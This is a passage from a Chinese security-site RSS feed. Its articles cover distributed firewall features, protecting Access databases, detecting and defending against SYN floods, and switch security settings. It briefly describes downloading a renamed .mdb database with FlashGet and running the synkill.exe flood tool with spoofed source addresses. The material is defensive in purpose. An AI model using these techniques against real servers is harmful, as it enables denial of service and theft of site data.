&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 包过滤是防火墙防止计算机受到攻击的最基本方法，防火墙实时地监控进入以及出去的数据包，根据特定的过滤规则决定是否让这些数据包通过。分布式防火墙可以直接处理IP（或与IP级别相当的ARP、RARP以及其它的非IP网络协议）数据包的发送与接收，根据数据包的包头信息，分析出网络协议、源地址、目的地址、源端口以及目的端口，然后对照过滤规则进行过滤。对于不符合过滤规则的数据包，防火墙将拒绝通过，同时进行记录或报警。<br />
<br />
<br />
<br />
<br />
<br />
3、基于状态的过滤<br />
<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 对于面向非连接的UDP网络访问，为了提供较强过滤控制，就必须根据上下文来进行判断。例如：对于一个请求进入的UDP访问，只有在它有对应的出去的UDP访问（地址和端口号相匹配）时才可以接受，否则将拒绝或报警。这就需要IP包过滤模块记录有过去已经发出的UDP访问的列表，这样的列表就叫做上下文。而对于面向连接的TCP访问，同样也可以根据不同的应用协议设定相应的上下文，进行更为细粒度的访问控制。这些技术统称为基于状态的包过滤。对于不符合规则的访问拒绝事件，要进行记录。<br />
<br />
<br />
<br />
<br />
<br />
4、特洛伊木马过滤<br />
<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 如果有黑客侵入到用户的计算机上，他会运行某一些特殊的应用程序与之进行通信，从而获取一些信息。分布式防火墙维护一个已知的应用程序列表，只有列表中的应用程序才可以使用网络，一旦检测到有未知的应用程序企图使用网络，系统将会提醒用户注意，是否要禁止使用或者是加入到允许访问网络的程序列表中.如果用户不小心运行了带有特洛伊木马的程序，当木马程序企图向网络发送信息时，分布式防火墙将会进行拦截。<br />
<br />
<br />
<br />
<br />
<br />
5、脚本过滤<br />
<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 脚本过滤功能对常见的各种脚本，如Java Script脚本、VB Script脚本在运行前被一一进行分析检查，判断它们是否会进行比较危险的操作；如果是，则提醒用户注意，并要求用户决定是否允许该脚本执行，从而有选择地让无害的脚本通过,对恶意的脚本进行拦截,实现实时脚本过滤.<br />
<br />
<br />
<br />
<br />
<br />
6、用户定制的安全策略<br />
<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 用户可以将任意的IP地址加入到自己的信任/不信任地址列表中，对于在信任地址列表中的地址传送过来的数据包，分布式防火墙将不进行任何阻拦，而对于在不信任列表中的地址传送过来的任何数据包，将拒绝接受。如果经常受到某些地址的攻击，用户可以将这些地址加入到不信任地址列表中，拒绝接受这些地址所发出的任何数据包。用户定制的安全策略必须是统一安全策略的超集，也就是说安全级别只能加强不能放松。<br />
<br />
<br />
<br />
<br />
<br />
7、日志和审计<br />
<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 日志用来记录防火墙在运行过程中所出现的各种情况，通过查看日志，用户可以及时、全面地掌握分布式防火墙本身的运转以及用户的访问情况，并可以根据这些日志来制定或修改安全管理策略.强大的日志记录功能，主要包括：<br />
<br />
<br />
<br />
(1)软件的安装、升级记录；<br />
<br />
(2)安全策略改变记录；<br />
<br />
(3)被拒绝的网络访问记录：包括被拒绝网络访问的应用程序名，使用的协议，源地址和目的地址，使用的端口等;<br />
<br />
(4)遭受到的攻击记录: 包括攻击者使用的协议、端口、来源地址.<br />
<br />
<br />
<br />
<br />
<br />
8、统一的安全策略管理服务器<br />
<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 安全策略文件以密文形式存放于硬盘中，用户不能直接对其阅读，也不可以对其进行随意更改。分布式防火墙启动时，安全策略文件经解密后加载到防火墙中。复杂的安全策略以Hash表的方法进行检索。使用Hash列表对安全策略文件进行检索能大大加快读取速度，安全策略可以动态更新，更新总在用户态进行，同时磁盘文件也被更新。用户可以在防火墙运行的过程中更改安全级别，而不影响防火墙的正常运行。更新完成后，系统将会在新的安全级别下工作。安全策略服务器和客户端防火墙之间采用SSL通信，保证了安全策略传输时的安全性。另外管理模块功能还包括：用户组管理，基于用户组的安全策略分配，实时监控当前网络状态，查看日志，更改安全级别，更改用户定制的安全属性等。<br />
<br />
<br />
<br />
<br />
<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 基于C/S架构的分布式防火墙产品，采用统一的安全策略管理服务器[Server]，各台主机客户端[Client]从服务器下载安全策略，设置多层安全过滤，拥有出色的入侵检测和强大的日志管理功能，安装方便,使用简洁，升级快捷，降低了维护成本，形成了可靠的网络安全体系，很好地满足了政府、企业、个人保护网络信息安全的迫切需求.<br />
<br />
<br />
<br />
参考文献<br />
<br />
[1]&nbsp;&nbsp;Jie Wu著,高传善 等译.分布式系统设计.北京:机械工业出版社,2001.<br />
<br />
[2]&nbsp;&nbsp;王柏,王红熳,邹华.分布计算环境.北京:北京邮电大学出版社,2000.<br />
<br />
[3]&nbsp;&nbsp;贾焰 等著.分布式数据库技术.北京:国防工业出版社,2000.<br />
<br />
[4]&nbsp;&nbsp;Charles Payne, Tom Marcham. Architecture and Applications for a Distributed Embedded Firewall. Secure Computing Corporation,2001.<br />
<br />
[5]&nbsp;&nbsp;Tom Marcham, Charles Payne. Security at the Network Edge. A Distributed Firewall Architecture. Presented at the DARPA information Survivability Conference II,2001.<br />
<br />
[6]&nbsp;&nbsp;William R. Cheswick, Steven M. Bellovin著;戴宗坤,罗万伯 等译.防火墙与因特网安全.北京:机械工业出版社,2000.<br />
<br />
[7]&nbsp;&nbsp;Keith E. Strassberg, Richard J. Gondek, Gary Rollie 等著,李昂 等译.防火墙技术大全.北京:机械工业出版社,2003.<br />
<br />
[8]&nbsp;&nbsp;Terry William Ogletree著,李之棠,李伟明,陈琳 等译.防火墙原理与实施.北京:电子工业出版社,2001.<br />
<br />
[9]&nbsp;&nbsp;王睿,林海波 等著.网络安全与防火墙技术.北京:清华大学出版社,2000.</p>]]></description>
			<link>https://www.cete.vip/show-3443-1.html</link>
			<category domain="https://www.cete.vip/category-5-1.html">网络安全</category>
			<pubDate>2009-02-26 13:02</pubDate>
		</item>
		<item>
			<guid>https://www.cete.vip/show-3352-1.html</guid>
			<title>从数据库管理下手　多手段提升网站安全</title>
			<author>海东青</author>
			<description><![CDATA[ 	<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;数据库，网站运营的基础，网站生存的要素，不管是个人用户还是企业用户都非常依赖网站数据库的支持，然而很多别有用心的攻击者也同样非常“看重”网站数据库。 <br/>对于个人网站来说，受到建站条件的制约，Access数据库成了广大个人网站站长的首选。然而，Access数据库本身存在很多安全隐患，攻击者一旦找到数据库文件的存储路径和文件名，后缀名为“.mdb”的Access数据库文件就会被下载，网站中的许多重要信息会被一览无余，非常可怕。当然，大家采用了各种措施来加强Access数据库文件的安全，但真的有效吗？ <br/>存在漏洞的保护措施 <br/>流传最为广泛的一种Access数据库文件保护措施，是将Access数据库文件的后缀名由“.mdb”改为“.asp”，接着再修改数据库连接文件(如conn.asp)中的数据库地址内容，这样一来即使别人知道数据库文件的文件名和存储位置，也无法进行下载。 <br/>这是网上最流行的一种增强Access数据库安全的方法，而且还有强大的“理论基础”。 <br/>因为“.mdb”文件不会被IIS服务器处理，而是直接将内容输出到Web浏览器，而“.asp”文件则要经过IIS服务器处理，Web浏览器显示的是处理结果，并不是ASP文件的内容。 <br/>但大家忽略了一个很重要的问题，这就是IIS服务器到底处理了ASP文档中的哪些内容。这里笔者提醒大家，只有ASP文件中“”标志符间的内容才会被IIS服务器处理，而其他内容则直接输出到用户的Web浏览器。你的数据库文件中包含这些特殊标志符吗？即使有，Access也可能会对文档中的“”标志符进行特殊处理，使之无效。因此后缀为“.asp”的数据库文件同样是不安全的，还是会被恶意下载。 <br/>面对蛊惑人心的理论，以及众人的附和，笔者也开始相信此方法的有效性。但事实胜于雄辩，一次无意间的试验，让笔者彻底揭穿了这个谣言。 <br/>笔者首先将一个名为“cpcw.mdb”的数据库文件改名为“cpcw.asp”，然后上传到网站服务器中。运行flashGet，进入“添加新的下载任务”对话框，在“网址”栏中输入“cpcw.asp”文件的存储路径，然后在“重命名”栏中输入“cpcw.mdb”。进行下载后，笔者发现可以很顺利地打开“cpcw.mdb”，而且它所存储的信息也被一览无余。这就充分说明了单纯地将数据库文件名的后缀“.mdb”改为“.asp”，还是存在安全隐患。 <br/>没有最“安全”，只有更“安全” <br/>任何事情都不是绝对的，因此增强Access数据库文件的安全也只是相对的。毕竟Access只能用于小型数据库的解决方案，它存在很多先天不足，特别是在安全方面。 <br/>我们所采用的各种方法，也只是相对来说增强了Access数据库文件的安全，并不能实现绝对的安全，毕竟先天不足的问题是无法解决的。下面笔者为大家介绍一些方法，虽然不能完全防止别人下载Access数据库文件，但只要你善用它们，Access数据库文件就会更安全。 <br/>方法一、数据库文件名应复杂 <br/>要下载Access数据库文件，首先必须知道该数据库文件的存储路径和文件名。如果你将原本非常简单的数据库文件名修改得更加复杂，这样那些“不怀好意”者就要花费更多的时间去猜测数据库文件名，无形中增强了Access数据库的安全性。 <br/>很多ASP程序为方便用户使用，它的数据库文件通常都被命名为“data.mdb”，这大大方便了有经验的攻击者。如果我们将数据库文件名修改得复杂一些，他人就不易猜到，如将“data.mdb”修改为“1rtj0ma27xi.mdb”,然后修改数据库连接文件中的相应信息。这样Access数据库就相对安全一些。此方法适合于那些租用Web空间的用户使用。 <br/>不足之处：一旦查看到数据库连接文件(如conn.asp)中的内容，再复杂的文件名也无济于事。 <br/>方法二、利用ODBC数据源 <br/>很多网站Web程序，将Access数据库文件的存储路径和文件名存放在数据库连接文件中。一旦这些连接文件中的内容外泄，那么不管数据库文件名多么复杂，都会暴露出踪迹。 <br/>这时就可以使用ODBC数据源方法，即使连接文件的内容外泄，他人也只能知道网站程序所使用的ODBC数据源名称，而数据库文件的存储路径和文件名却无法找到。 <br/>手工修改数据库连接文件(如conn.asp)中的内容，以及创建ODBC数据源。下面以笔者的论坛程序为例，首先将conn.asp文档中的 <br/><br/>DBPath = Server.MapPath("./data/1rtj0ma27xi.mdb") <br/><br/>conn.Open "driver={Microsoft Access Driver (*.mdb)};dbq=" &amp; DBPath<br/>修改为：conn.open "rtjmaxi"，其中“rtjmaxi”是指ODBC数据源名称。 <br/>接着在IIS服务器中新建名为“rtjmaxi”的ODBC数据源，并在其中指定“1rtj0ma27xi.mdb”数据库文件的位置即可，最后点击“确定”按钮完成配置。 <br/>不足之处：此方法不适合于租用Web空间的用户使用，要想使用ODBC数据源方法，必须要有管理和维护IIS服务器的权限。 <br/>方法三、改变存储位置 <br/>一般情况下，Access数据库文件存放在相应的Web目录中，很多黑客就是利用这种规律来查找并下载数据库文件。 <br/>因此可以采用改变数据库文件存储位置的方法，将数据库文件存放在Web目录以外的某个文件夹中，让黑客难以猜测存储位置。 <br/>接着修改好数据库连接文件(如conn.asp)中的数据库文件相应信息，这样Access数据库文件就安全多了。即使攻击者通过连接文件找到数据库文件的存储路径，由于数据库文件存放在Web目录以外的地方，攻击者就无法通过HTTP方式下载数据库文件。 <br/>例如，IIS网站的Web目录位于“D:&#92;wwwroot”下，在该Web目录下的“DATA”文件夹中存放着“1rtj0ma27xi.mdb”，现在笔者将该数据库文件转移到Web目录以外的“D:&#92;CPCW”文件夹下。然后修改数据库连接文件，将 <br/><br/>DBPath=Server.MapPath("./data/1rtj0ma27xi.mdb")修改为 <br/><br/>DBPath=Server.MapPath("../cpcw/1rtj0ma27xi.mdb")这样Access数据库文件就安全多了。虽然数据库文件没有存放在Web目录中，但并不影响ASP程序访问数据库。 <br/>不足之处：此方法不适合于租用Web空间的用户使用，因为将Access数据库文件移至Web目录之外，一般需要很大的权限。 <br/>以上方法，在不同程度上增强了Access数据库文件的安全性，但大家不能将它们当成“仙丹妙药”，毕竟网络环境是复杂的，黑客的破坏手段也在不断增强，大家可以根据自己的需要，选择其中的多种方法配合使用，效果才理想，Access数据库文件才会更安全。 ]]></description>
			<link>https://www.cete.vip/show-3352-1.html</link>
			<category domain="https://www.cete.vip/category-5-1.html">网络安全</category>
			<pubDate>2009-02-25 14:58</pubDate>
		</item>
		<item>
			<guid>https://www.cete.vip/show-3353-1.html</guid>
			<title>SYN攻击原理以及检测防范技术</title>
			<author>海东青</author>
			<description><![CDATA[ 	<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;据统计，在所有黑客攻击事件中，SYN攻击是最常见又最容易被利用的一种攻击手法。相信很多人还记得2000年YAHOO网站遭受的攻击事例，当时黑客利用的就是简单而有效的SYN攻击，有些网络蠕虫病毒配合SYN攻击造成更大的破坏。本文介绍SYN攻击的基本原理、工具及检测方法，并全面探讨SYN攻击防范技术。 　　一、TCP握手协议 　　在TCP/IP协议中，TCP协议提供可靠的连接服务，采用三次握手建立一个连接。 　　第一次握手：建立连接时，客户端发送syn包(syn=j)到服务器，并进入SYN_SEND状态，等待服务器确认； 第二次握手：服务器收到syn包，必须确认客户的SYN（ack=j 1），同时自己也发送一个SYN包（syn=k），即SYN ACK包，此时服务器进入SYN_RECV状态； 　　第三次握手：客户端收到服务器的SYN＋ACK包，向服务器发送确认包ACK(ack=k 1)，此包发送完毕，客户端和服务器进入ESTABLISHED状态，完成三次握手。 　　完成三次握手，客户端与服务器开始传送数据，在上述过程中，还有一些重要的概念： 未连接队列：在三次握手协议中，服务器维护一个未连接队列，该队列为每个客户端的SYN包（syn=j）开设一个条目，该条目表明服务器已收到SYN包，并向客户发出确认，正在等待客户的确认包。这些条目所标识的连接在服务器处于Syn_RECV状态，当服务器收到客户的确认包时，删除该条目，服务器进入ESTABLISHED状态。 Backlog参数：表示未连接队列的最大容纳数目。 　　SYN-ACK 重传次数　服务器发送完SYN－ACK包，如果未收到客户确认包，服务器进行首次重传，等待一段时间仍未收到客户确认包，进行第二次重传，如果重传次数超过系统规定的最大重传次数，系统将该连接信息从半连接队列中删除。注意，每次重传等待的时间不一定相同。 　　半连接存活时间：是指半连接队列的条目存活的最长时间，也即服务从收到SYN包到确认这个报文无效的最长时间，该时间值是所有重传请求包的最长等待时间总和。有时我们也称半连接存活时间为Timeout时间、SYN_RECV存活时间。 　　二、SYN攻击原理 　　SYN攻击属于DOS攻击的一种，它利用TCP协议缺陷，通过发送大量的半连接请求，耗费CPU和内存资源。SYN攻击除了能影响主机外，还可以危害路由器、防火墙等网络系统，事实上SYN攻击并不管目标是什么系统，只要这些系统打开TCP服务就可以实施。从上图可看到，服务器接收到连接请求（syn=j），将此信息加入未连接队列，并发送请求包给客户（syn=k,ack=j 1），此时进入SYN_RECV状态。当服务器未收到客户端的确认包时，重发请求包，一直到超时，才将此条目从未连接队列删除。配合IP欺骗，SYN攻击能达到很好的效果，通常，客户端在短时间内伪造大量不存在的IP地址，向服务器不断地发送syn包，服务器回复确认包，并等待客户的确认，由于源地址是不存在的，服务器需要不断的重发直至超时，这些伪造的SYN包将长时间占用未连接队列，正常的SYN请求被丢弃，目标系统运行缓慢，严重者引起网络堵塞甚至系统瘫痪。<br/>三、SYN攻击工具 　　SYN攻击实现起来非常的简单，互联网上有大量现成的SYN攻击工具。 　　1、windows系统下的SYN工具 　　以synkill.exe为例，运行工具，选择随机的源地址和源端囗，并填写目标机器地址和TCP端囗，激活运行，很快就会发现目标系统运行缓慢。如果攻击效果不明显，可能是目标机器并未开启所填写的TCP端囗或者防火墙拒绝访问该端囗，此时可选择允许访问的TCP端囗，通常，windows系统开放tcp139端囗，UNIX系统开放tcp7、21、23等端囗。 　　四、检测SYN攻击 　　检测SYN攻击非常的方便，当你在服务器上看到大量的半连接状态时，特别是源IP地址是随机的，基本上可以断定这是一次SYN攻击。我们使用系统自带的netstat 工具来检测SYN攻击： 　　# netstat -n -p TCP 　　tcp　0　 0 10.11.11.11:23　　124.173.152.8:25882　 SYN_RECV　- 　　tcp　0　 0 10.11.11.11:23　　236.15.133.204:2577　 SYN_RECV　- 　　tcp　0　 0 10.11.11.11:23　　127.160.6.129:51748　 SYN_RECV　- 　　tcp　0　 0 10.11.11.11:23　　222.220.13.25:47393　 SYN_RECV　- 　　tcp　0　 0 10.11.11.11:23　　212.200.204.182:60427 SYN_RECV　- 　　tcp　0　 0 10.11.11.11:23　　232.115.18.38:278　　 SYN_RECV　- 　　tcp　0　 0 10.11.11.11:23　　239.116.95.96:5122　　SYN_RECV　- 　　tcp　0　 0 10.11.11.11:23　　236.219.139.207:49162 SYN_RECV　- 　　... 　　上面是在LINUX系统中看到的，很多连接处于SYN_RECV状态（在WINDOWS系统中是SYN_RECEIVED状态），源IP地址都是随机的，表明这是一种带有IP欺骗的SYN攻击。 　　我们也可以通过下面的命令直接查看在LINUX环境下某个端囗的未连接队列的条目数： 　　＃netstat -n -p TCP 　 grep SYN_RECV 　 grep :22 　 wc -l 　　324 　　显示TCP端囗22的未连接数有324个，虽然还远达不到系统极限，但应该引起管理员的注意。 五、SYN攻击防范技术　 　　关于SYN攻击防范技术，人们研究得比较早。归纳起来，主要有两大类，一类是通过防火墙、路由器等过滤网关防护，另一类是通过加固TCP/IP协议栈防范.但必须清楚的是，SYN攻击不能完全被阻止，我们所做的是尽可能的减轻SYN攻击的危害，除非将TCP协议重新设计。 　　1、过滤网关防护 　　这里，过滤网关主要指明防火墙，当然路由器也能成为过滤网关。防火墙部署在不同网络之间，防范外来非法攻击和防止保密信息外泄，它处于客户端和服务器之间，利用它来防护SYN攻击能起到很好的效果。过滤网关防护主要包括超时设置，SYN网关和SYN代理三种。 　　■网关超时设置：防火墙设置SYN转发超时参数（状态检测的防火墙可在状态表里面设置），该参数远小于服务器的timeout时间。当客户端发送完SYN包，服务端发送确认包后（SYN＋ACK），防火墙如果在计数器到期时还未收到客户端的确认包（ACK），则往服务器发送RST包，以使服务器从队列中删去该半连接。值得注意的是，网关超时参数设置不宜过小也不宜过大，超时参数设置过小会影响正常的通讯，设置太大，又会影响防范SYN攻击的效果，必须根据所处的网络应用环境来设置此参数。 　　■SYN网关：SYN网关收到客户端的SYN包时，直接转发给服务器；SYN网关收到服务器的SYN/ACK包后，将该包转发给客户端，同时以客户端的名义给服务器发ACK确认包。此时服务器由半连接状态进入连接状态。当客户端确认包到达时，如果有数据则转发，否则丢弃。事实上，服务器除了维持半连接队列外，还要有一个连接队列，如果发生SYN攻击时，将使连接队列数目增加，但一般服务器所能承受的连接数量比半连接数量大得多，所以这种方法能有效地减轻对服务器的攻击。 　　■SYN代理：当客户端SYN包到达过滤网关时，SYN代理并不转发SYN包，而是以服务器的名义主动回复SYN/ACK包给客户，如果收到客户的ACK包，表明这是正常的访问，此时防火墙向服务器发送ACK包并完成三次握手。SYN代理事实上代替了服务器去处理SYN攻击，此时要求过滤网关自身具有很强的防范SYN攻击能力。<br/>2、加固tcp/ip协议栈 　　防范SYN攻击的另一项主要技术是调整tcp/ip协议栈，修改tcp协议实现。主要方法有SynAttackProtect保护机制、SYN cookies技术、增加最大半连接和缩短超时时间等。tcp/ip协议栈的调整可能会引起某些功能的受限，管理员应该在进行充分了解和测试的前提下进行此项工作。 　　■SynAttackProtect机制 　　为防范SYN攻击，win2000系统的tcp/ip协议栈内嵌了SynAttackProtect机制，Win2003系统也采用此机制。SynAttackProtect机制是通过关闭某些socket选项，增加额外的连接指示和减少超时时间，使系统能处理更多的SYN连接，以达到防范SYN攻击的目的。默认情况下，Win2000操作系统并不支持SynAttackProtect保护机制，需要在注册表以下位置增加SynAttackProtect键值： 　　HKLM&#92;SYSTEM&#92;CurrentControlSet&#92;Services&#92;Tcpip&#92;Parameters 　　当SynAttackProtect值（如无特别说明，本文提到的注册表键值都为十六进制）为0或不设置时，系统不受SynAttackProtect保护。 　　当SynAttackProtect值为1时，系统通过减少重传次数和延迟未连接时路由缓冲项（route cache entry）防范SYN攻击。 当SynAttackProtect值为2时（Microsoft推荐使用此值），系统不仅使用backlog队列，还使用附加的半连接指示，以此来处理更多的SYN连接，使用此键值时，tcp/ip的TCPInitialRTT、window size和可滑动窗囗将被禁止。 　　我们应该知道，平时，系统是不启用SynAttackProtect机制的，仅在检测到SYN攻击时，才启用，并调整tcp/ip协议栈。那么系统是如何检测SYN攻击发生的呢？事实上，系统根据TcpMaxHalfOpen,TcpMaxHalfOpenRetried 和TcpMaxPortsExhausted三个参数判断是否遭受SYN攻击。 　　TcpMaxHalfOpen 表示能同时处理的最大半连接数，如果超过此值，系统认为正处于SYN攻击中。Win2000　server默认值为100，Win2000　Advanced server为500。 　　TcpMaxHalfOpenRetried定义了保存在backlog队列且重传过的半连接数，如果超过此值，系统自动启动SynAttackProtect机制。Win2000　server默认值为80，Win2000 Advanced server为400。 　　TcpMaxPortsExhausted　是指系统拒绝的SYN请求包的数量，默认是5。 　　如果想调整以上参数的默认值，可以在注册表里修改（位置与SynAttackProtect相同） 　　■ SYN cookies技术 　　我们知道，TCP协议开辟了一个比较大的内存空间backlog队列来存储半连接条目，当SYN请求不断增加，并这个空间，致使系统丢弃SYN连接。为使半连接队列被塞满的情况下，服务器仍能处理新到的SYN请求，SYN cookies技术被设计出来。 　　SYN cookies应用于linux、FreeBSD等操作系统，当半连接队列满时，SYN　cookies并不丢弃SYN请求，而是通过加密技术来标识半连接状态。 在TCP实现中，当收到客户端的SYN请求时，服务器需要回复SYN＋ACK包给客户端，客户端也要发送确认包给服务器。通常，服务器的初始序列号由服务器按照一定的规律计算得到或采用随机数，但在SYN cookies中，服务器的初始序列号是通过对客户端IP地址、客户端端囗、服务器IP地址和服务器端囗以及其他一些安全数值等要素进行hash运算，加密得到的，称之为cookie。当服务器遭受SYN攻击使得backlog队列满时，服务器并不拒绝新的SYN请求，而是回复cookie（回复包的SYN序列号）给客户端， 如果收到客户端的ACK包，服务器将客户端的ACK序列号减去1得到cookie比较值，并将上述要素进行一次hash运算，看看是否等于此cookie。如果相等，直接完成三次握手（注意：此时并不用查看此连接是否属于backlog队列）。 　　在RedHat linux中，启用SYN cookies是通过在启动环境中设置以下命令来完成： 　　# echo 1 &gt; /proc/sys/net/ipv4/tcp_syncookies 　　■ 增加最大半连接数 　　大量的SYN请求导致未连接队列被塞满，使正常的TCP连接无法顺利完成三次握手，通过增大未连接队列空间可以缓解这种压力。当然backlog队列需要占用大量的内存资源，不能被无限的扩大。 　　WIN2000：除了上面介绍的TcpMaxHalfOpen, TcpMaxHalfOpenRetried参数外，WIN2000操作系统可以通过设置动态backlog(dynamic backlog)来增大系统所能容纳的最大半连接数，配置动态backlog由AFD.SYS驱动完成，AFD.SYS是一种内核级的驱动，用于支持基于window socket的应用程序，比如ftp、telnet等。AFD.SYS在注册表的位置： HKLM&#92;System&#92;CurrentControlSet&#92;Services&#92;AFD&#92;ParametersEnableDynamicBacklog值为1时，表示启用动态backlog，可以修改最大半连接数。　 MinimumDynamicBacklog表示半连接队列为单个TCP端囗分配的最小空闲连接数，当该TCP端囗在backlog队列的空闲连接小于此临界值时，系统为此端囗自动启用扩展的空闲连接（DynamicBacklogGrowthDelta），Microsoft推荐该值为20。 　　MaximumDynamicBacklog是当前活动的半连接和空闲连接的和，当此和超过某个临界值时，系统拒绝SYN包，Microsoft推荐MaximumDynamicBacklog值不得超过2000。 　　DynamicBacklogGrowthDelta值是指扩展的空闲连接数，此连接数并不计算在MaximumDynamicBacklog内，当半连接队列为某个TCP端囗分配的空闲连接小于MinimumDynamicBacklog时，系统自动分配DynamicBacklogGrowthDelta所定义的空闲连接空间，以使该TCP端囗能处理更多的半连接。Microsoft推荐该值为10。 　　LINUX：Linux用变量tcp_max_syn_backlog定义backlog队列容纳的最大半连接数。在Redhat 7.3中，该变量的值默认为256，这个值是远远不够的，一次强度不大的SYN攻击就能使半连接队列占满。我们可以通过以下命令修改此变量的值： 　　# sysctl -w net.ipv4.tcp_max_syn_backlog="2048" 　　Sun Solaris Sun Solaris用变量tcp_conn_req_max_q0来定义最大半连接数，在Sun Solaris 8中，该值默认为1024，可以通过add命令改变这个值： 　　# ndd -set /dev/tcp tcp_conn_req_max_q0 2048 　　HP-UX：HP-UX用变量tcp_syn_rcvd_max来定义最大半连接数，在HP-UX　11.00中，该值默认为500，可以通过ndd命令改变默认值： 　　＃ndd -set /dev/tcp tcp_syn_rcvd_max 2048 　　■缩短超时时间 　　上文提到，通过增大backlog队列能防范SYN攻击；另外减少超时时间也使系统能处理更多的SYN请求。我们知道，timeout超时时间，也即半连接存活时间，是系统所有重传次数等待的超时时间总和，这个值越大，半连接数占用backlog队列的时间就越长，系统能处理的SYN请求就越少。为缩短超时时间，可以通过缩短重传超时时间（一般是第一次重传超时时间）和减少重传次数来实现。 　　Win2000第一次重传之前等待时间默认为3秒，为改变此默认值，可以通过修改网络接囗在注册表里的TcpInitialRtt注册值来完成。重传次数由TcpMaxConnectResponseRetransmissions 来定义，注册表的位置是：HKLM&#92;SYSTEM&#92;CurrentControlSet&#92;Services&#92;Tcpip&#92;Parameters registry key。 　　当然我们也可以把重传次数设置为0次，这样服务器如果在3秒内还未收到ack确认包就自动从backlog队列中删除该连接条目。 　　LINUX：Redhat使用变量tcp_synack_retries定义重传次数，其默认值是5次，总超时时间需要3分钟。 　　Sun Solaris Solaris　默认的重传次数是3次，总超时时间为3分钟，可以通过ndd命令修改这些默认值。 ]]></description>
			<link>https://www.cete.vip/show-3353-1.html</link>
			<category domain="https://www.cete.vip/category-5-1.html">网络安全</category>
			<pubDate>2009-02-25 14:58</pubDate>
		</item>
		<item>
			<guid>https://www.cete.vip/show-3351-1.html</guid>
			<title>让网络坚不可摧</title>
			<author>海东青</author>
			<description><![CDATA[ 	<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;如何过滤用户通讯，保障安全有效的数据转发？如何阻挡非法用户，保障网络安全应用？如何进行安全网管，及时发现网络非法用户、非法行为及远程网管信息的安全性呢？这里我们总结了6 条近期交换机市场上一些流行的安全设置功能，希望对大家有所帮助。 　　L2-L4 层过滤 　　现在的新型交换机大都可以通过建立规则的方式来实现各种过滤需求。规则设置有两种模式，一种是MAC模式，可根据用户需要依据源MAC或目的MAC有效实现数据的隔离，另一种是IP模式，可以通过源IP、目的IP、协议、源应用端口及目的应用端口过滤数据封包；建立好的规则必须附加到相应的接收或传送端口上，则当交换机此端口接收或转发数据时，根据过滤规则来过滤封包，决定是转发还是丢弃。另外，交换机通过硬件“逻辑与非门”对过滤规则进行逻辑运算，实现过滤规则确定，完全不影响数据转发速率。 　　802.1X 基于端口的访问控制 　　为了阻止非法用户对局域网的接入，保障网络的安全性，基于端口的访问控制协议802.1X无论在有线LAN或WLAN中都得到了广泛应用。例如华硕最新的GigaX2024/2048等新一代交换机产品不仅仅支持802.1X 的Local、RADIUS 验证方式，而且支持802.1X 的Dynamic VLAN 的接入，即在VLAN和802.1X 的基础上，持有某用户账号的用户无论在网络内的何处接入，都会超越原有802.1Q 下基于端口VLAN 的限制，始终接入与此账号指定的VLAN组内，这一功能不仅为网络内的移动用户对资源的应用提供了灵活便利，同时又保障了网络资源应用的安全性；另外，GigaX2024/2048 交换机还支持802.1X的Guest VLAN功能，即在802.1X的应用中，如果端口指定了Guest VLAN项，此端口下的接入用户如果认证失败或根本无用户账号的话，会成为Guest VLAN 组的成员，可以享用此组内的相应网络资源，这一种功能同样可为网络应用的某一些群体开放最低限度的资源，并为整个网络提供了一个最外围的接入安全。 　　流量控制(traffic control) 　　交换机的流量控制可以预防因为广播数据包、组播数据包及因目的地址错误的单播数据包数据流量过大造成交换机带宽的异常负荷，并可提高系统的整体效能，保持网络安全稳定的运行。 　　安全网管SNMP v3 提出全新的体系结构，将各版本的SNMP 标准集中到一起，进而加强网管安全性。SNMP v3 建议的安全模型是基于用户的安全模型，即USM。USM对网管消息进行加密和认证是基于用户进行的，具体地说就是用什么协议和密钥进行加密和认证均由用户名称(userNmae)权威引擎标识符(EngineID)来决定(推荐加密协议CBCDES，认证协议HMAC-MD5-96 和HMAC-SHA-96)，通过认证、加密和时限提供数据完整性、数据源认证、数据保密和消息时限服务，从而有效防止非授权用户对管理信息的修改、伪装和窃听。 　　至于通过Telnet 的远程网络管理，由于Telnet 服务有一个致命的弱点——它以明文的方式传输用户名及口令，所以，很容易被别有用心的人窃取口令，受到攻击，但采用SSH进行通讯时，用户名及口令均进行了加密，有效防止了对口令的窃听，便于网管人员进行远程的安全网络管理。 　　交换机的Syslog 日志功能可以将系统错误、系统配置、状态变化、状态定期报告、系统退出等用户设定的期望信息传送给日志服务器，网管人员依据这些信息掌握设备的运行状况，及早发现问题，及时进行配置设定和排障，保障网络安全稳定地运行。 　　Watchdog 通过设定一个计时器，如果设定的时间间隔内计时器没有重启，则生成一个内在CPU重启指令，使设备重新启动，这一功能可使交换机在紧急故障或意外情况下时可智能自动重启，保障网络的运行。 　　一些最新的交换机， 像A S U SGigaX2024/2048还具备双映像文件。这一功能保护设备在异常情况下(固件升级失败等)仍然可正常启动运行。文件系统分majoy和mirror两部分进行保存，如果一个文件系统损害或中断，另外一个文件系统会将其重写，如果两个文件系统都损害，则设备会清除两个文件系统并重写为出厂时默认设置，确保系统安全启动运行。 　　其实，近期出现的一些交换机产品在安全设计上大都下足了功夫——层层设防、节节过滤，想尽一切办法将可能存在的不安全因素最大程度地排除在外。广大企业用户如果能够充分利用这些网络安全设置功能，进行合理的组合搭配，则可以最大限度地防范网络上日益泛滥的各种攻击和侵害，愿您的企业网络自此也能更加稳固安全。  ]]></description>
			<link>https://www.cete.vip/show-3351-1.html</link>
			<category domain="https://www.cete.vip/category-5-1.html">网络安全</category>
			<pubDate>2009-02-25 14:58</pubDate>
		</item>
		<item>
			<guid>https://www.cete.vip/show-3349-1.html</guid>
			<title>在cisco路由器上使用tcp拦截防止dos攻击</title>
			<author>海东青</author>
